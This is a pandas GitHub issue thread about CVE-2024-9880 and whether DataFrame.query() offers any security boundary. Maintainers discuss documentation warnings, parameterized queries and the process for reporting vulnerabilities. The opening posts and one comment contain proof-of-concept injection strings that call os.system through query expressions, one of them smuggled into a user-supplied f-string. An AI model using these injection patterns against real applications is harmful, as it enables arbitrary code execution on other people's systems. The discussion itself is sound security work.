Research
-
[X] I have searched the [pandas] tag on StackOverflow for similar questions.
-
[X] I have asked my usage related question on StackOverflow.
Link to question on StackOverflow
https://stackoverflow.com/questions/79304226/should-i-manually-patch-the-pandas-dataframe-query-vulnerability-or-wait-for-a
(To clarify, this question was written by another user.)
Question about pandas
Hi, I saw this question on StackOverflow, which is about a public CVE, CVE-2024-9880.
The basic premise of the CVE is that if an attacker controls the expr
argument to DataFrame.query(), then arbitrary code execution can be achieved.
The example given in the CVE is
import pandas as pd
df = pd.DataFrame({'a': [1, 2, 3], 'b': ['error_details', 'confidential_info', 'normal']})
query = '@pd.core.frame.com.builtins.__import__("os").system("""ping google.com #""")'
try:
engine = "python"
result = df.query(query,local_dict={},engine="python",).index
except Exception as e:
print(f'Error: {e}')
However, this is not minimal, and a more minimal construction would be
import pandas as pd
df = pd.DataFrame()
expr = '@pd.compat.os.system("""echo foo""")'
result = df.query(expr, engine='python')
(The report also says that engine='python'
is required, but both engine='python'
and engine='numexpr'
worked in my testing.)
My question is about Pandas's security model. What security guarantees does Pandas make about DataFrame.query() with an attacker-controlled expr
?
My intuition about this is "none, don't do that," but I'm wondering what the Pandas project thinks.
Comment From: skj-skj
any updates? Snyk is flagging this as High Severity Vulnerability and is blocking my deployment.
its unfortunate it is happening on Holidays.
Comment From: rhshadrach
My intuition about this is "none, don't do that," but I'm wondering what the Pandas project thinks.
This is indeed my take, both query and eval should be used with string literals and not with strings provided by or derived from untrusted user input.
cc @pandas-dev/pandas-core
Comment From: Dr-Irv
This is indeed my take, both query and eval should be used with string literals and not with strings provided by or derived from untrusted user input.
This could be tricky, because something like this should be OK:
mystr = "something from a user"
df.query(f"a_column == {mystr}")
In other words, it's OK to construct a query string based on user input.
Comment From: nickodell
This could be tricky, because something like this should be OK:
Isn't this technique still vulnerable to injection? Example:
import pandas as pd
df = pd.DataFrame({'a_column': []})
mystr = '@pd.compat.os.system("""echo foo""")'
df.query(f"a_column == {mystr}")
This still prints 'foo' for me.
Comment From: Dr-Irv
Isn't this technique still injectable?
Yes, so it seems that the caller that creates the parameter to query()
needs to put a safeguard around that computation.
Comment From: rhshadrach
@Dr-Irv - I do not think it is a reasonable expectation that users are able to implement a safeguard. Preventing query-injection can be very difficult. This is why SQL libraries provide such functionality. It seems to me either pandas needs to provide it or make the recommendation that users do not use query/eval in this manner.
Comment From: WillAyd
The eval documentation has a warning against this (see https://github.com/pandas-dev/pandas/pull/59108). I think can be added to query as well
Comment From: WillAyd
As an added note, please do not report security vulnerabilities to our github page. If you suspect or know of one, we have a process in place through our partnership agreement with Tidelift.
See https://tidelift.com/docs/security for more details on how to report going forward. Locking this conversation for now - thanks!
Comment From: TomAugspurger
Agreed with Will, that repeating that warning in the docs for query
is worth doing. pandas doesn't attempt to sanitize the input in any way, so there's not a security boundary here. (we could have a discussion about whether we wanted to attempt to sanitize things, but IMO it's not worth it).
A bit more context on this specific report. It was reported to the pandas-security team, and we replied that it wasn't considered a vulnerability. I'm not sure why they obtained / published a CVE :/
Comment From: TomAugspurger
@ethansilvas, @aftersnow, @huntr-helper I see that you're active on https://huntr.com/bounties/a49baae1-4652-4d6c-a179-313c21c41a8d. If possible, could you attempt to retract that CVE? Thanks!
Comment From: WillAyd
On a side note we probably need to better document the security reporting process to Tidelift. I didn't see it in the website - am I overlooking?
Comment From: TomAugspurger
Not sure whether we have a link from the site.
We have https://github.com/pandas-dev/pandas/security, which is the standard place for GitHub. Also linking from the site, if we aren't already, would be nice.
edit: https://pandas.pydata.org/docs/development/policies.html#security-policy links to https://github.com/pandas-dev/pandas/security, so you'll get there eventually.
Comment From: skj-skj
is it possible to add parameterized query like there is for SQL in DataFrame().query()
or is it already available?
Comment From: WillAyd
@skj-skj if you want to open a dedicate issue to discuss that I think it would be better. My initial thought is that we wouldn't want to build that ourselves and create that security boundary. It has the potential to be a lot of work to maintain, not in an area we specialize in, and we are already resource constrained. If there's a dedicated library that could be used for that purpose maybe it can be leveraged. But yea I think worth opening an issue dedicated to discuss that if its something you are passionate about
Comment From: bashtage
I do not think it is a reasonable expectation that users are able to implement a safeguard. Preventing query-injection can be very difficult. This is why SQL libraries provide such functionality. It seems to me either pandas needs to provide it or make the recommendation that users do not use query/eval in this manner.
I think that someone who is using .query
with arbitrary input from untrusted users should have the knowledge to use it without sanitization. Is there anything that query
can do that can't be done with other methods that would not have the same security risk?
Comment From: bashtage
Reading this thread, this feels like a great idea for a project that extends query
but with a promise of security, a la parameterized SQL.
Comment From: CTPassion
From what I've read in this thread, am I right that the development team doesn't consider this a vulnerability and will not be making changes (other than perhaps a logging warning)?
In that case there are many people like myself who will need to inform SNYK as it is considering this a high risk vulnerability that is blocking pipelines. SNYK Pandas
Comment From: bashtage
That is correct. Pandas doesn't make any security promises with query
, and so users who pass untrusted data to query
must provide any required security.
@TomAugspurger 's comment above has the most precis answer.
Comment From: mcclanahanmp
To note, I did submit an inquiry on the 26th to security@tidelift.com, but have yet to receive a response. However, thank you all for your input on this matter and @CTPassion and @bashtage for clarifying. -SrvrAdmin
Comment From: CTPassion
Note, SNYK have removed this as a vulnerability https://security.snyk.io/vuln/SNYK-PYTHON-PANDAS-8549481 :)
Comment From: beefkit
I saw that this was officially moved on 3/20 into the NVD and is 'awaiting analysis', so seems like we will be getting an answer soon so this can be removed off our scans.
https://nvd.nist.gov/vuln/detail/CVE-2024-9880
Our security team has let this progress into needing an acceptance of risk from our client. I explained that we do not even use this method nor is a validated CVE.. Seems that Tenable assigns scores and purports them as valid when they have not even been validated by NIST or accepted into the NVD. They also do not even test for this vulnerability but only rely off the reported version number.
Hoping NIST can wrap this up fast so this can be closed.
https://www.tenable.com/cve/CVE-2024-9880
Comment From: jvparidon
This ended up in the NVD because of a report filed at https://huntr.com/bounties/a49baae1-4652-4d6c-a179-313c21c41a8d. I posted to huntr to see if they'd be willing to follow SNYK's lead and mark this as not a vulnerability, which would presumably be the easiest way to resolve this problem.